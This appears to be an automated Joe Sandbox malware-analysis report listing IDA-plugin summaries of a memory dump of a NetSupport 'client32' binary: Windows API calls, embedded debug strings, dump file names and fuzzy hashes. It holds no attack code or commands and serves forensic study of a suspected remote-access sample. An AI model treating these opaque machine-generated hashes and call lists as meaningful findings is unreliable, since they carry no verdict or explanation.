                                                                                          • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                        • IsWindow.USER32(00000000), ref: 1103F4EA
                                                                                        • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
                                                                                        Strings
                                                                                        • DoMMData - could not find %s window, xrefs: 1103F50D
                                                                                        • PCIVideoSlave32, xrefs: 1103F508
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Find$MessageSendSleep
                                                                                        • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                                        • API String ID: 1010850397-3146847729
                                                                                        • Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                        • Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
                                                                                        • Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                        • Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 110816D7
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                        • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                        • API String ID: 2441568934-1875806619
                                                                                        • Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                        • Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
                                                                                        • Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                        • Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
                                                                                        APIs
                                                                                        • GetDeviceCaps.GDI32(?,0000000E,00000000,00000000,?,?,110F0082,00000000,?,?,?,?,110F011A,00000000), ref: 110EFB32
                                                                                        • GetDeviceCaps.GDI32(?,0000000C,?,?,110F0082,00000000,?,?,?,?,110F011A,00000000,?,?,110F0E7E,?), ref: 110EFB39
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                        • API String ID: 2713834284-4292231205
                                                                                        • Opcode ID: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
                                                                                        • Instruction ID: cfed96a02f924fb25650393b30a092bd0643f011e0ddcc2ee79cac053fdacdf4
                                                                                        • Opcode Fuzzy Hash: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
                                                                                        • Instruction Fuzzy Hash: 4AE04F23F4123937EA11659AAC46FCAF79C9B867A8F0201B2FA04FB392E5D16C0446D5
                                                                                        APIs
                                                                                          • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,756F110C,1100BF7B), ref: 11110928
                                                                                          • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                        • _free.LIBCMT ref: 1103D221
                                                                                          • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                          • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                          • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                                        • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                        • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                        Strings
                                                                                        • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                        • String ID: Show has overrun too much, aborting
                                                                                        • API String ID: 304545663-4092325870
                                                                                        • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                        • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                                        • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                        • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                        • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                        • API String ID: 1136984157-1986719024
                                                                                        • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                        • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                        • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                        • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnumExitSleepThreadWindows
                                                                                        • String ID: TapiFix
                                                                                        • API String ID: 1804117399-2824097521
                                                                                        • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                        • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                                        • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                        • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                                        • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                        • API String ID: 1319256379-1986719024
                                                                                        • Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                        • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                                        • Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                        • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • std::exception::exception.LIBCMT ref: 1100BBF0
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1100BC05
                                                                                        • std::exception::exception.LIBCMT ref: 1100BC14
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1100BC29
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1651403513-0
                                                                                        • Opcode ID: d105c775ddae6e4726b07b80f939296b7c9628154e9c4022b4af25f4ab2e10ff
                                                                                        • Instruction ID: 24df0323ce75f1771b5e486737171493ff854af14d8bb6c891eae8217b7a1c7e
                                                                                        • Opcode Fuzzy Hash: d105c775ddae6e4726b07b80f939296b7c9628154e9c4022b4af25f4ab2e10ff
                                                                                        • Instruction Fuzzy Hash: 28711BB9A05B09DFD715CF68C980A9AFBF4FB48714F10866EE86A97740D730A904CB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2782032738-0
                                                                                        • Opcode ID: 34f750520889ae1c8a8219b8bb8fb379717b18fbdc33fa4f6fc2ff7c413ea70f
                                                                                        • Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
                                                                                        • Opcode Fuzzy Hash: 34f750520889ae1c8a8219b8bb8fb379717b18fbdc33fa4f6fc2ff7c413ea70f
                                                                                        • Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
                                                                                        APIs
                                                                                        • MessageBeep.USER32(00000000,?,11071AD8,?,?,?,1106D28C,006A006A,B24479DC,?,?,00000000,11182C98,000000FF,?,11071AD8), ref: 1106791B
                                                                                        • MessageBeep.USER32(00000000,?,11071AD8,?,?,?,1106D28C,006A006A,B24479DC,?,?,00000000,11182C98,000000FF,?,11071AD8), ref: 11067957
                                                                                        • MessageBeep.USER32(00000000,?,11071AD8), ref: 110679AA
                                                                                        • MessageBeep.USER32(00000000,?,11071AD8,?,?,?,1106D28C,006A006A,B24479DC,?,?,00000000,11182C98,000000FF,?,11071AD8), ref: 110679EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: BeepMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2359647504-0
                                                                                        • Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                        • Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
                                                                                        • Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                        • Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
                                                                                        APIs
                                                                                          • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                          • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                                        • _malloc.LIBCMT ref: 110491DD
                                                                                        • _memmove.LIBCMT ref: 110491EA
                                                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001033C,?,00000002,00001388,?), ref: 11049224
                                                                                        • _free.LIBCMT ref: 1104922B
                                                                                          • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                          • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                          • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                          • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                          • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
